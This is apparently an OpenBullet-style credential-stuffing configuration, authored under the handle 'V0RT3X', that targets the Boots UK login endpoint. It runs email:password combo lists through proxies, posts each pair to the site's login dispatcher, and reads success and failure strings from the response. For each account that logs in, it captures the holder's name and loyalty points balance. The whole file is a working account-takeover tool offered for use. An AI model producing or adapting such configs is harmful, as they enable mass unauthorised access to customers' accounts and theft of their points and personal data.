[SETTINGS]
{
  "Name": "Boots UK || V0RT3X",
  "SuggestedBots": 50,
  "LastModified": "2019-04-03T17:20:46.3007829+01:00",
  "AdditionalInfo": "",
  "Author": "V0RT3X",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.boots.com/LoginRequestDispatcher" 
  CONTENT "storeId=11352&catalogId=28501&reLogonURL=LogonForm&myAcctMain=1&fromOrderId=*&toOrderId=.&deleteIfEmpty=*&continue=1&createIfEmpty=1&calculationUsageId=-1&updatePrices=0&errorViewName=AjaxOrderItemDisplayView&previousPage=logon&returnPage=&addFavCallOnLogin=&dispatch_logon=&URL=OrderItemMove%3Fpage%3D%26URL%3DOrderCalculate%253FURL%253Dhttps%3A%2F%2Fwww.boots.com%2FAjaxLogonForm%26calculationUsageId%3D-1%26calculationUsageId%3D-2%26calculationUsageId%3D-7%26deleteCartCookie%3Dtrue&logonId=<USER>&logonPassword=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "visid_incap_949787=6Zb8UrtWRH+xRQncqUSsopvRpFwAAAAAQUIPAAAAAADTpryhAA1Imiyh/BBrkia8; nlbi_949787=d7eaZ0sDZ0RXq39wb/11CwAAAAAzStFgae6AephihpGjup+O; incap_ses_1177_949787=w8wdDjPjLmFm/kXUb4tVEJvRpFwAAAAAw3BOtQCcUhaI8R6Zr8P8cw==; userVisitId=hvg5-1554305446993-m80k; bt_lastClick=organic; cmTPSet=Y; CoreID6=11842892568915543054483&ci=90208333; deepLinkVisited=true; _ga=GA1.2.912109290.1554305449; _gid=GA1.2.1491695083.1554305449; _gcl_au=1.1.1174775230.1554305450; sc.ASP.NET_SESSIONID=0a5mfta33zhx0bewtezttzrr; Apache=170.225.181.248.1554305451195344; JSESSIONID=0000gbcrc84yGr7yUp456voiOQW: 1cn142547; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=-1%2C11352; at=invalidated; CompareItems_11352=; WC_CartOrderId_11352=; WC_CartOrderId_11355=; WC_DeleteCartCookie_11352=true; selectedPrescriptionProductID=; selectedPrescriptionProductName=; UserType=G; DISPLAYNAME=guest;" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<h2 class=\"my_account_header\" aria-level=\"1\">hello&nbsp;" 
  KEYCHAIN Failure OR 
    KEY "The email address and/or password you entered has not been recognised." 
REQUEST GET "https://www.boots.com/AjaxLogonForm?myAcctMain=1&catalogId=28501&langId=-1&storeId=11352" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "hello&nbsp;" "<" -> CAP "Name" 
PARSE "<SOURCE>" LR "</span> points worth <span class=\"bold_span\">" "</span>" -> CAP "Balance" 
